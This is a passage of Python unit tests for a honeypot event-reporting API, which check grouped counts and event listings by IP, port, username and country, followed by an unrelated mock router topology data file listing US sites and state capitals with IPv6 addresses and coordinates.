self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/network/country_ip_dest?country=US")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/network/country_ip_dest?date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(
API_URL + "/api/events/count/groupby/network/country_ip_dest?country_ip_dest=US&date=2020-08-14"
)
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
def test_top_ten_credential_events(self):
response_port = requests.get(API_URL + "/api/events/count/groupby/credential/ip_dest")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/credential/ip_dest?country=US")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/credential/ip_dest?date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(
API_URL + "/api/events/count/groupby/credential/ip_dest?country=US&date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/credential/port_dest")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/credential/port_dest?country=US")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/credential/port_dest?date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(
API_URL + "/api/events/count/groupby/credential/port_dest?country=US&date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/credential/username")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/credential/username?country=US")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/credential/username?date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(
API_URL + "/api/events/count/groupby/credential/username?country=US&date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/credential/password")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/credential/password?country=US")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/credential/password?date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(
API_URL + "/api/events/count/groupby/credential/password?country=US&date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/credential/machine_name")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/credential/machine_name?country=US")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/credential/machine_name?date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(
API_URL + "/api/events/count/groupby/credential/machine_name?country=US&date=2020-08-14"
)
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/credential/country_ip_dest")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/credential/country_ip_dest?country=US")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/credential/country_ip_dest?date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(
API_URL + "/api/events/count/groupby/credential/country_ip_dest?country=US&date=2020-08-14"
)
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
def test_top_ten_file_events(self):
response_port = requests.get(API_URL + "/api/events/count/groupby/file/ip_dest")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/file/ip_dest?country=US")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/file/ip_dest?date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/file/ip_dest?country=US&date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/file/port_dest")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/file/port_dest?country=US")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/file/port_dest?date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/file/port_dest?country=US&date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/file/username")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/file/username?country=US")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/file/username?date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/file/username?country=US&date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/file/password")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/file/password?country=US")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/file/password?date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/file/password?country=US&date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/file/machine_name")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/file/machine_name?country=US")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/file/machine_name?date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(
API_URL + "/api/events/count/groupby/file/machine_name?country=US&date=2020-08-14"
)
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/file/country_ip_dest")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/file/country_ip_dest?country=US")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/file/country_ip_dest?date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(
API_URL + "/api/events/count/groupby/file/country_ip_dest?country=US&date=2020-08-14"
)
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
def test_top_ten_data_events(self):
response_port = requests.get(API_URL + "/api/events/count/groupby/data/ip_dest")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/data/ip_dest?country=US")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/data/ip_dest?date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/data/ip_dest?country=US&date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/data/port_dest")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/data/port_dest?country=US")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/data/port_dest?date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/data/port_dest?country=US&date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/data/username")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/data/username?country=US")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/data/username?date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/data/username?country=US&date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/data/password")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/data/password?country=US")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/data/password?date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/data/password?country=US&date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/data/machine_name")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/data/machine_name?country=US")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/data/machine_name?date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(
API_URL + "/api/events/count/groupby/data/machine_name?country=US&date=2020-08-14"
)
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/data/country_ip_dest")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/data/country_ip_dest?country=US")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/data/country_ip_dest?date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(
API_URL + "/api/events/count/groupby/data/country_ip_dest?country=US&date=2020-08-14"
)
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
def test_honeypot_events_list(self):
response_honeypot = requests.get(API_URL + "/api/events/explore/honeypot")
self.assertGreaterEqual(len(response_honeypot.json()), 0)
self.assertEqual(response_honeypot.status_code, 200)
response_honeypot_countries = requests.get(
API_URL + "/api/events/explore/honeypot?module_name=ssh/strong_password"
)
self.assertGreaterEqual(len(response_honeypot_countries.json()), 0)
self.assertEqual(response_honeypot_countries.status_code, 200)
response_honeypot_countries = requests.get(
API_URL + "/api/events/explore/honeypot?date=2020-08-14"
)
self.assertGreaterEqual(len(response_honeypot_countries.json()), 0)
self.assertEqual(response_honeypot_countries.status_code, 200)
response_honeypot_machinenames = requests.get(
API_URL + "/api/events/explore/honeypot?module_name=ssh/strong_password&date=2020-08-14"
)
self.assertGreaterEqual(len(response_honeypot_machinenames.json()), 0)
self.assertEqual(response_honeypot_machinenames.status_code, 200)
def test_network_events_list(self):
response_network = requests.get(API_URL + "/api/events/explore/network")
self.assertGreaterEqual(len(response_network.json()), 0)
self.assertEqual(response_network.status_code, 200)
response_network_countries = requests.get(
API_URL + "/api/events/explore/network?module_name=ssh/strong_password"
| |
"""
topology data for routers
based on: mockTopoData.js by tylevine on 7/7/14.
Used to create API response for to UI
updated 20150312 with more nodes (50 state capitals)
"""
topologyData = {
'nodes': [{
'name': 'sfc',
'latitude': 38.4815631942872,
'ipaddress': 'fc00:db20:35b:7399::5',
'site': 'sfc',
'longitude': -122.625227367593,
'type': 'transit',
'icon': 'router',
'y': 550.31264292335,
'x': -1021.91217850693
}, {
'name': 'sea',
'latitude': 47.6062,
'ipaddress': 'fdf8:f53e:61e4::18',
'site': 'sea',
'longitude': -122.332,
'type': 'transit',
'icon': 'router',
'y': -9.8292223022888,
'x': -552.893870303646
}, {
'name': 'hst',
'latitude': 29.7633,
'ipaddress': 'fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b',
'site': 'hst',
'longitude': -95.3633,
'type': 'transit',
'icon': 'router',
'y': 1185.49743746152,
'x': 93.011342707737
}, {
'name': 'chi',
'latitude': 41.85,
'ipaddress': 'fc00:e968:6179::de52:7100',
'site': 'chi',
'longitude': -87.65,
'type': 'transit',
'icon': 'router',
'y': -1.78890844737532,
'x': 347.621281446664
}, {
'name': 'atl',
'latitude': 33.7861178428426,
'ipaddress': 'fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b',
'site': 'atl',
'longitude': -84.1959236252621,
'type': 'transit',
'icon': 'router',
'y': 1188.17754207982,
'x': 476.26630312528
}, {
'name': 'min',
'latitude': 44.98,
'ipaddress': 'fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b',
'site': 'min',
'longitude': -93.2638,
'type': 'transit',
'icon': 'router',
'y': -4.46901306567981,
'x': -67.7949343905326
}, {
'name': 'lax',
'latitude': 34.0522,
'ipaddress': 'fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b',
'site': 'lax',
'longitude': -118.244,
'type': 'transit',
'icon': 'router',
'y': 941.607917195807,
'x': -702.979728928698
}, {
'name': 'kcy',
'latitude': 39.0997,
'ipaddress': 'fdf8:f53e:61e4::18',
'site': 'kcy',
'longitude': -94.5786,
'type': 'transit',
'icon': 'router',
'y': 539.592224450132,
'x': -65.1148297722282
}, {
'name': 'nyc',
'latitude': 40.7879,
'ipaddress': 'fdf8:f53e:61e4::18',
'site': 'nyc',
'longitude': -74.0143,
'type': 'transit',
'icon': 'router',
'y': 378.785947351863,
'x': 679.954254116421
}, {
'name': 'wdc',
'latitude': 38.8951,
'ipaddress': 'fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b',
'site': 'wdc',
'longitude': -77.0364,
'type': 'transit',
'icon': 'router',
'y': 767.401117006014,
'x': 599.551115567286
}, {
'name': 'por',
'latitude': 45.5234,
'ipaddress': 'fdf8:f53e:61e4::18',
'site': 'por',
'longitude': -122.676,
'type': 'transit',
'icon': 'router',
'y': -15.1894315388978,
'x': -1016.55196927032
}, {
'name': 'alb',
'latitude': 42.6526,
'ipaddress': 'fc00:db20:35b:7399::5',
'site': 'alb',
'longitude': -73.7562,
'type': 'transit',
'icon': 'router',
'y': 0.891196170929173,
'x': 1041.76837758753
}, {
'name': 'mia',
'latitude': 25.7743,
'ipaddress': 'fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b',
'site': 'mia',
'longitude': -80.1937,
'type': 'transit',
'icon': 'router',
'y': 1177.4571236066,
'x': 1023.0076452594
}, {
'name': 'san',
'latitude': 32.7153,
'ipaddress': 'fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b',
'site': 'san',
'longitude': -117.157,
'type': 'transit',
'icon': 'router',
'y': 1180.13722822491,
'x': -400.12790706029
}, {
'name': 'bos',
'latitude': 42.3584,
'ipaddress': 'fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b',
'site': 'bos',
'longitude': -71.0598,
'type': 'transit',
'icon': 'router',
'y': 378.785947351863,
'x': 1341.94009483763
},
{
'name': 'sjc',
'latitude': 36.137242513163,
'ipaddress': 'fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b',
'site': 'sjc',
'longitude': -120.754451723841,
'type': 'transit',
'icon': 'router',
'y': 547.632538305046,
'x': -558.254079540255
},
{
'name': 'dxb',
'latitude': 25.2531745,
'ipaddress': 'fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b',
'site': 'dxb',
'longitude': 55.36567279999997,
'type': 'transit',
'icon': 'router',
'y': 547.632538305046,
'x': -558.254079540255
},
{
'name': 'sin',
'latitude': 1.352083,
'ipaddress': 'fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b',
'site': 'sin',
'longitude': 103.81983600000001,
'type': 'transit',
'icon': 'router',
'y': 547.632538305046,
'x': -558.254079540255
},
{'icon': 'router',
'ipaddress': 'fc00:e968:6179::de52:7100',
'latitude': '32.380120',
'longitude': '-86.300629',
'name': 'AL',
'site': 'Montgomery',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fc00:db20:35b:7399::5',
'latitude': '58.299740',
'longitude': '-134.406794',
'name': 'AK',
'site': 'Juneau',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b',
'latitude': '33.448260',
'longitude': '-112.075774',
'name': 'AZ',
'site': 'Phoenix',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b',
'latitude': '34.748655',
'longitude': '-92.274494',
'name': 'AR',
'site': 'Little Rock',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fdf8:f53e:61e4::18',
'latitude': '38.579065',
'longitude': '-121.491014',
'name': 'CA',
'site': 'Sacramento',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b',
'latitude': '39.740010',
'longitude': '-104.992259',
'name': 'CO',
'site': 'Denver',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fc00:db20:35b:7399::5',
'latitude': '41.763325',
'longitude': '-72.674069',
'name': 'CT',
'site': 'Hartford',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fc00:e968:6179::de52:7100',
'latitude': '39.158035',
'longitude': '-75.524734',
'name': 'DE',
'site': 'Dover',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fdf8:f53e:61e4::18',
'latitude': '30.439775',
'longitude': '-84.280649',
'name': 'FL',
'site': 'Tallahassee',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fdf8:f53e:61e4::18',
'latitude': '33.748315',
'longitude': '-84.391109',
'name': 'GA',
'site': 'Atlanta',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fc00:db20:35b:7399::5',
'latitude': '21.304770',
'longitude': '-157.857614',
'name': 'HI',
'site': 'Honolulu',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b',
'latitude': '43.606980',
'longitude': '-116.193409',
'name': 'ID',
'site': 'Boise',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fc00:db20:35b:7399::5',
'latitude': '39.801055',
'longitude': '-89.643604',
'name': 'IL',
'site': 'Springfield',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b',
'latitude': '39.766910',
'longitude': '-86.149964',
'name': 'IN',
'site': 'Indianapolis',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b',
'latitude': '41.589790',
'longitude': '-93.615659',
'name': 'IA',
'site': 'Des Moines',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b',
'latitude': '39.049285',
'longitude': '-95.671184',
'name': 'KS',
'site': 'Topeka',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fdf8:f53e:61e4::18',
'latitude': '38.195070',
'longitude': '-84.878694',
'name': 'KY',
'site': 'Frankfort',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b',
'latitude': '30.443345',
'longitude': '-91.186994',
'name': 'LA',
'site': 'Baton Rouge',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fc00:db20:35b:7399::5',
'latitude': '44.318036',
'longitude': '-69.776218',
'name': 'ME',
'site': 'Augusta',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fc00:db20:35b:7399::5',
'latitude': '38.976700',
'longitude': '-76.489934',
'name': 'MD',
'site': 'Annapolis',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b',
'latitude': '42.358635',
'longitude': '-71.056699',
'name': 'MA',
'site': 'Boston',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b',
'latitude': '42.731940',
'longitude': '-84.552249',
'name': 'MI',
'site': 'Lansing',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b',
'latitude': '44.943829',
'longitude': '-93.093326',
'name': 'MN',
'site': 'Saint Paul',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fdf8:f53e:61e4::18',
'latitude': '32.298690',
'longitude': '-90.180489',
'name': 'MS',
'site': 'Jackson',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fdf8:f53e:61e4::18',
'latitude': '38.577515',
'longitude': '-92.177839',
'name': 'MO',
'site': 'Jefferson City',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fc00:e968:6179::de52:7100',
'latitude': '46.589760',
'longitude': '-112.021202',
'name': 'MT',
'site': 'Helana',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b',
'latitude': '40.813620',
'longitude': '-96.707739',
'name': 'NE',
'site': 'Lincoln',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b',
'latitude': '39.164885',
'longitude': '-119.766999',
'name': 'NV',
'site': 'Carson City',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b',
'latitude': '43.207250',
'longitude': '-71.536604',
'name': 'NH',
'site': 'Concord',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fdf8:f53e:61e4::18',
'latitude': '40.217875',
'longitude': '-74.759404',
'name': 'NJ',
'site': 'Trenton',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b',
'latitude': '35.691543',
'longitude': '-105.937406',
'name': 'NM',
'site': 'Santa Fe',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fdf8:f53e:61e4::18',
'latitude': '42.651445',
'longitude': '-73.755254',
'name': 'NY',
'site': 'Albany',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b',
'latitude': '35.785510',
'longitude': '-78.642669',
'name': 'NC',
'site': 'Raleigh',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b',
'latitude': '46.805372',
'longitude': '-100.779334',
'name': 'ND',
'site': 'Bismarck',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fc00:db20:35b:7399::5',
'latitude': '39.961960',
'longitude': '-83.002984',
'name': 'OH',
'site': 'Columbus',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fc00:e968:6179::de52:7100',
'latitude': '35.472015',
'longitude': '-97.520354',
'name': 'OK',
'site': 'Oklahoma City',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fdf8:f53e:61e4::18',
'latitude': '44.933260',
'longitude': '-123.043814',
'name': 'OR',
'site': 'Salem',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fc00:db20:35b:7399::5',
'latitude': '40.259865',
'longitude': '-76.882230',
'name': 'PA',
'site': 'Harrisburg',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b',
'latitude': '41.823875',
'longitude': '-71.411994',
'name': 'RI',
'site': 'Providence',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fdf8:f53e:61e4::18',
'latitude': '33.998550',
'longitude': '-81.045249',
'name': 'SC',
'site': 'Columbia',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fc00:e968:6179::de52:7100',
'latitude': '44.368924',
'longitude': '-100.350158',
'name': 'SD',
'site': 'Pierre',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b',
'latitude': '36.167783',
'longitude': '-86.778365',
'name': 'TN',
'site': 'Nashville',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b',
'latitude': '30.267605',
'longitude': '-97.742984',
'name': 'TX',
'site': 'Austin',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fc00:e968:6179::de52:7100',
'latitude': '40.759505',
'longitude': '-111.888229',
'name': 'UT',
'site': 'Salt Lake City',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fdf8:f53e:61e4::18',
'latitude': '44.260299',
'longitude': '-72.576264',
'name': 'VT',
'site': 'Montpelier',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fc00:e968:6179::de52:7100',
'latitude': '37.540700',
'longitude': '-77.433654',
'name': 'VA',
